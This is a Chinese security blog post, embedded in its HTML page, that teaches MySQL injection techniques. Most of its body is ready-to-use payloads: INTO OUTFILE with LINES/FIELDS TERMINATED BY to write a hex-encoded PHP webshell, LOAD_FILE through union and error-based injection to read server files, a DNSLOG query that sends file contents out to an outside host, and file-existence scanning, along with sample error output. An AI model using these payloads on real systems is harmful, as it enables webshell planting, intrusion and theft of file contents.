<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



  
  
  <link rel="stylesheet" media="all" href="/lib/Han/dist/han.min.css?v=3.3">




<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="Mysql,webshell," />





  <link rel="alternate" href="/atom.xml" title="BlackWolf's Blog" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/static/picture/icon.jpg?v=5.1.1" />






<meta name="description" content="0x00 前言近期分析mysql利用报错注入读取文件内容，利用LINES TERMINATED BY在查询只返回一个字段时写webshell文件，以及如何利用load_file扫描判断文件是否存在。">
<meta name="keywords" content="Mysql,webshell">
<meta property="og:type" content="article">
<meta property="og:title" content="报错注入邂逅LOAD_FILE&amp;INTO OUTFILE搭讪LINES">
<meta property="og:url" content="http://blackwolfsec.cc/2018/07/19/mysql_file/index.html">
<meta property="og:site_name" content="BlackWolf&#39;s Blog">
<meta property="og:description" content="0x00 前言近期分析mysql利用报错注入读取文件内容，利用LINES TERMINATED BY在查询只返回一个字段时写webshell文件，以及如何利用load_file扫描判断文件是否存在。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://blackwolfsec.cc/static/picture/mysql_file_1.png">
<meta property="og:image" content="http://blackwolfsec.cc/static/picture/mysql_file_2.png">
<meta property="og:image" content="http://blackwolfsec.cc/static/picture/mysql_file_3.png">
<meta property="og:image" content="http://blackwolfsec.cc/static/picture/mysql_file_4.png">
<meta property="og:image" content="http://blackwolfsec.cc/static/picture/mysql_file_5.png">
<meta property="og:updated_time" content="2018-08-13T02:04:24.960Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="报错注入邂逅LOAD_FILE&amp;INTO OUTFILE搭讪LINES">
<meta name="twitter:description" content="0x00 前言近期分析mysql利用报错注入读取文件内容，利用LINES TERMINATED BY在查询只返回一个字段时写webshell文件，以及如何利用load_file扫描判断文件是否存在。">
<meta name="twitter:image" content="http://blackwolfsec.cc/static/picture/mysql_file_1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"right","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: 'undefined',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://blackwolfsec.cc/2018/07/19/mysql_file/"/>





  <title>报错注入邂逅LOAD_FILE&INTO OUTFILE搭讪LINES | BlackWolf's Blog</title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  















  
  
    
  

  <div class="container sidebar-position-right page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">BlackWolf's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <h1 class="site-subtitle" itemprop="description">silence & hear</h1>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            我的简历
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://blackwolfsec.cc/2018/07/19/mysql_file/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="邮箱地址：YWRtaW5AYmxhY2t3b2xmc2VjLmNj">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/static/picture/logo.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="BlackWolf's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h2 class="post-title" itemprop="name headline">报错注入邂逅LOAD_FILE&INTO OUTFILE搭讪LINES</h2>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-07-19T21:50:39+08:00">
                2018-07-19
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Security/" itemprop="url" rel="index">
                    <span itemprop="name">Security</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
            </span>
          

          

          

        </div>
      </header>
    

    <div class="post-body han-init-context" itemprop="articleBody">

      
      

      
        <h2 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h2><p>近期分析mysql利用报错注入读取文件内容，利用LINES TERMINATED BY在查询只返回一个字段时写webshell文件，以及如何利用load_file扫描判断文件是否存在。</p>
<a id="more"></a>
<h2 id="0x01-into-outfile写文件"><a href="#0x01-into-outfile写文件" class="headerlink" title="0x01 into outfile写文件"></a>0x01 <a href="https://mariadb.com/kb/en/library/select-into-outfile/" target="_blank" rel="noopener">into outfile</a>写文件</h2><ul>
<li>要求用户具有file权限</li>
<li>文件不能覆盖写入，所以文件必须为不存在</li>
<li>如果secure_file_priv非空，则写入文件的目录只能为对应目录下</li>
</ul>
<p><strong>注意:</strong></p>
<p>FIELDS TERMINATED BY原理为在输出数据的每个字段之间插入webshell内容，所以如果select返回的只有一个字段，则写入的文件不包含webshell内容,例如下面语句<code>SELECT username FROM user WHERE id = 1 into outfile &#39;D:/1.php&#39; FIELDS TERMINATED BY 0x3c3f70687020706870696e666f28293b3f3e</code>，写入的文件中只包含username的值而没有webshell内容;</p>
<p>LINES TERMINATED BY和LINES STARTING  BY原理为在输出每条记录的结尾或开始处插入webshell内容，所以即使只查询一个字段也可以写入webshell内容，更为通用。此外，该类方式可以应用于limit等不能union的语句之后进行写文件操作。</p>
<h3 id="1-union注入写文件"><a href="#1-union注入写文件" class="headerlink" title="1. union注入写文件"></a>1. union注入写文件</h3><figure class="highlight crystal"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM user WHERE id = -<span class="number">1</span> <span class="class"><span class="keyword">union</span> <span class="title">select</span> 1,2,0<span class="title">x3c3f70687020706870696e666f28293b3f3e</span> <span class="title">into</span> <span class="title">outfile</span> '<span class="title">D</span>:/1.<span class="title">php</span>'</span></span><br></pre></td></tr></table></figure>
<h3 id="2-FIELDS-TERMINATED-BY（可在limit等语句后）"><a href="#2-FIELDS-TERMINATED-BY（可在limit等语句后）" class="headerlink" title="2. FIELDS TERMINATED BY（可在limit等语句后）"></a>2. FIELDS TERMINATED BY（可在limit等语句后）</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> * <span class="keyword">FROM</span> <span class="keyword">user</span> <span class="keyword">WHERE</span> <span class="keyword">id</span> = <span class="number">1</span> <span class="keyword">into</span> <span class="keyword">outfile</span> <span class="string">'D:/1.php'</span> <span class="keyword">fields</span> <span class="keyword">terminated</span> <span class="keyword">by</span> <span class="number">0x3c3f70687020706870696e666f28293b3f3e</span></span><br></pre></td></tr></table></figure>
<h3 id="3-LINES-TERMINATED-BY（可用于limit等sql注入）"><a href="#3-LINES-TERMINATED-BY（可用于limit等sql注入）" class="headerlink" title="3. LINES TERMINATED BY（可用于limit等sql注入）"></a>3. LINES TERMINATED BY（可用于limit等sql注入）</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> username <span class="keyword">FROM</span> <span class="keyword">user</span> <span class="keyword">WHERE</span> <span class="keyword">id</span> = <span class="number">1</span> <span class="keyword">into</span> <span class="keyword">outfile</span> <span class="string">'D:/1.php'</span> <span class="keyword">LINES</span> <span class="keyword">TERMINATED</span> <span class="keyword">BY</span> <span class="number">0x3c3f70687020706870696e666f28293b3f3e</span></span><br></pre></td></tr></table></figure>
<h3 id="4-LINES-STARTING-BY（可用于limit等sql注入）"><a href="#4-LINES-STARTING-BY（可用于limit等sql注入）" class="headerlink" title="4. LINES STARTING  BY（可用于limit等sql注入）"></a>4. LINES STARTING  BY（可用于limit等sql注入）</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> username <span class="keyword">FROM</span> <span class="keyword">user</span> <span class="keyword">WHERE</span> <span class="keyword">id</span> = <span class="number">1</span> <span class="keyword">into</span> <span class="keyword">outfile</span> <span class="string">'D:/2.php'</span> <span class="keyword">LINES</span> <span class="keyword">STARTING</span>  <span class="keyword">BY</span> <span class="number">0x3c3f70687020706870696e666f28293b3f3e</span></span><br></pre></td></tr></table></figure>
<h2 id="0x02-LOAD-FILE读文件"><a href="#0x02-LOAD-FILE读文件" class="headerlink" title="0x02 LOAD_FILE读文件"></a>0x02 <a href="https://mariadb.com/kb/en/library/load_file/" target="_blank" rel="noopener">LOAD_FILE</a>读文件</h2><ul>
<li>要求用户具有file权限</li>
<li>如果secure_file_priv非空，则只能读取对应目录下的文件</li>
</ul>
<h3 id="1-联合注入-load-file读文件"><a href="#1-联合注入-load-file读文件" class="headerlink" title="1. 联合注入+load_file读文件"></a>1. 联合注入+load_file读文件</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> * <span class="keyword">FROM</span> <span class="keyword">user</span> <span class="keyword">WHERE</span> <span class="keyword">id</span>=<span class="number">-1</span> <span class="keyword">UNION</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="string">'1'</span>,(<span class="keyword">select</span> <span class="keyword">load_file</span>(<span class="string">'D:/1.php'</span>))</span><br></pre></td></tr></table></figure>
<h3 id="2-DNSLOG带外查询"><a href="#2-DNSLOG带外查询" class="headerlink" title="2. DNSLOG带外查询"></a>2. DNSLOG带外查询</h3><ul>
<li>需要windows环境</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> <span class="keyword">id</span> <span class="keyword">FROM</span> <span class="keyword">user</span> <span class="keyword">WHERE</span> <span class="keyword">id</span> = <span class="keyword">load_file</span> (<span class="keyword">concat</span>(<span class="string">'\\\\'</span>,<span class="keyword">hex</span>((<span class="keyword">select</span> <span class="keyword">load_file</span>(<span class="string">'D:/1.php'</span>))),<span class="string">'.t00ls.xxxxxxxxx.tu4.org\\a.txt'</span>))</span><br></pre></td></tr></table></figure>
<h3 id="3-报错注入-load-file读文件"><a href="#3-报错注入-load-file读文件" class="headerlink" title="3. 报错注入+load_file读文件"></a>3. 报错注入+load_file读文件</h3><p>ps:<em>报错注入读文件内容，有时候会由于报错长度受限或者文件编码问题，推荐采用hex编码方式分段读取文件内容</em><br> <figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">user</span>  <span class="keyword">where</span> username = <span class="string">''</span> <span class="keyword">and</span> updatexml(<span class="number">0</span>,<span class="keyword">concat</span>(<span class="number">0x7e</span>,(<span class="keyword">LOAD_FILE</span>(<span class="string">'D:/1.php'</span>)),<span class="number">0x7e</span>),<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">user</span> <span class="keyword">where</span> <span class="keyword">id</span>=<span class="number">1</span> <span class="keyword">and</span> (extractvalue(<span class="number">1</span>,<span class="keyword">concat</span>(<span class="number">0x7e</span>,(<span class="keyword">select</span> (<span class="keyword">LOAD_FILE</span>(<span class="string">'D:/1.php'</span>))),<span class="number">0x7e</span>)))</span><br></pre></td></tr></table></figure></p>
<p> 某CMS报错注入读取文件实例1:</p>
<p> <img src="http://blackwolfsec.cc/static/picture/mysql_file_1.png" alt="image"></p>
<p> 某CMS报错注入读取文件实例2:</p>
<p> <img src="http://blackwolfsec.cc/static/picture/mysql_file_2.png" alt="image"></p>
<h2 id="0x03-扫描文件是否存在"><a href="#0x03-扫描文件是否存在" class="headerlink" title="0x03 扫描文件是否存在"></a>0x03 扫描文件是否存在</h2><ul>
<li>要求用户具有file权限</li>
<li>如果secure_file_priv非空，则只能扫描判断对应目录下的文件</li>
</ul>
<p><strong>原理：</strong><br>load_file读取文件时，如果没有对应的权限获取或者文件不存在则函数返回NULL,所以结合isnull+load_file可以扫描判断文件名是否存在</p>
<figure class="highlight subunit"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">如果文件存在，isnull(load_file('文件名'))返回0</span><br><span class="line">mysql&gt; select * from user  where username = '' and updatexml(0,concat(0x7e,isnull(LOAD_FILE('D:/1.php')),0x7e),0);</span><br><span class="line"><span class="keyword">ERROR </span>1105 (HY000): XPATH syntax error: '~0~'</span><br><span class="line"></span><br><span class="line">如果文件不存在isnull(load_file('文件名'))返回1</span><br><span class="line">mysql&gt; select * from user  where username = '' and updatexml(0,concat(0x7e,isnull(LOAD_FILE('D:/xxxxx')),0x7e),0);</span><br><span class="line"><span class="keyword">ERROR </span>1105 (HY000): XPATH syntax error: '~1~'</span><br></pre></td></tr></table></figure>
<p> 某CMS报错注入扫描文件实例，存在文件C:/Windows/win.ini</p>
<p><img src="http://blackwolfsec.cc/static/picture/mysql_file_3.png" alt="image"></p>
<p> 某CMS报错注入扫描文件实例，不存在文件C:/Windows/passwd</p>
<p><img src="http://blackwolfsec.cc/static/picture/mysql_file_4.png" alt="image"><br>可以结合burp爆破扫描文件名</p>
<p><img src="http://blackwolfsec.cc/static/picture/mysql_file_5.png" alt="image"></p>
<h2 id="0x04小结"><a href="#0x04小结" class="headerlink" title="0x04小结"></a>0x04小结</h2><ul>
<li>倘若知道绝对路径且有权限时，通常都是直接into outfile写webshell</li>
<li>不知道网站绝对路径时，可以尝试读取常见的配置文件获取网站绝对路径，然后进行写操作；或者直接读取敏感的文件，获取信息进行其他操作。</li>
<li>此外load_file可以在盲注情况下，利用DNSLOG带外获取内容，或者hex()函数转换后按位读取敏感的文件内容</li>
<li>还有很多的利用技巧，大家自行研究，多多分享</li>
</ul>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Mysql/" rel="tag"># Mysql</a>
          
            <a href="/tags/webshell/" rel="tag"># webshell</a>
          
        </div>
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/07/18/BFscan/" rel="next" title="BFscan-A Bypass waF  Scanner">
                <i class="fa fa-chevron-left"></i> BFscan-A Bypass waF  Scanner
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/07/30/sql_update_insert/" rel="prev" title="Insert和Update型SQL注入的实践之旅">
                Insert和Update型SQL注入的实践之旅 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/static/picture/logo.jpg"
               alt="邮箱地址：YWRtaW5AYmxhY2t3b2xmc2VjLmNj" />
          <p class="site-author-name" itemprop="name">邮箱地址：YWRtaW5AYmxhY2t3b2xmc2VjLmNj</p>
           
              <p class="site-description motion-element" itemprop="description"></p>
           
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">53</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">10</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">51</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="http://anquanquan.info" target="_blank" title="安全圈">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  安全圈
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://das.scusec.org/" target="_blank" title="小黑屋">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  小黑屋
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://www.ourren.com/" target="_blank" title="ourren">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  ourren
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://wps2015.org/" target="_blank" title="wps2015">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  wps2015
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://ohroot.com/" target="_blank" title="半饱和">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  半饱和
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://www.mauu.me/" target="_blank" title="ksss'blog">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  ksss'blog
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://ecma.io/" target="_blank" title="该隐">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  该隐
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://www.sccsec.com" target="_blank" title="胖胖的博客">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  胖胖的博客
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://phantom0301.cc/" target="_blank" title="零の杂货铺">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  零の杂货铺
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://syean.cn/" target="_blank" title="我是_一棵树_">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  我是_一棵树_
                </a>
              </span>
            
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x00-前言"><span class="nav-number">1.</span> <span class="nav-text">0x00 前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-into-outfile写文件"><span class="nav-number">2.</span> <span class="nav-text">0x01 into outfile写文件</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-union注入写文件"><span class="nav-number">2.1.</span> <span class="nav-text">1. union注入写文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-FIELDS-TERMINATED-BY（可在limit等语句后）"><span class="nav-number">2.2.</span> <span class="nav-text">2. FIELDS TERMINATED BY（可在limit等语句后）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-LINES-TERMINATED-BY（可用于limit等sql注入）"><span class="nav-number">2.3.</span> <span class="nav-text">3. LINES TERMINATED BY（可用于limit等sql注入）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-LINES-STARTING-BY（可用于limit等sql注入）"><span class="nav-number">2.4.</span> <span class="nav-text">4. LINES STARTING  BY（可用于limit等sql注入）</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-LOAD-FILE读文件"><span class="nav-number">3.</span> <span class="nav-text">0x02 LOAD_FILE读文件</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-联合注入-load-file读文件"><span class="nav-number">3.1.</span> <span class="nav-text">1. 联合注入+load_file读文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-DNSLOG带外查询"><span class="nav-number">3.2.</span> <span class="nav-text">2. DNSLOG带外查询</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-报错注入-load-file读文件"><span class="nav-number">3.3.</span> <span class="nav-text">3. 报错注入+load_file读文件</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-扫描文件是否存在"><span class="nav-number">4.</span> <span class="nav-text">0x03 扫描文件是否存在</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x04小结"><span class="nav-number">5.</span> <span class="nav-text">0x04小结</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy;  2016 - 
  <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">邮箱地址：YWRtaW5AYmxhY2t3b2xmc2VjLmNj</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="http://blackwolfsec.cc/">
    NexT.Mist
  </a>
</div>


        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      
    </span>
  
</div>


        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>

  
  <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.1"></script>



  


  




	





  





  





  






  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (search_path.endsWith("json")) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
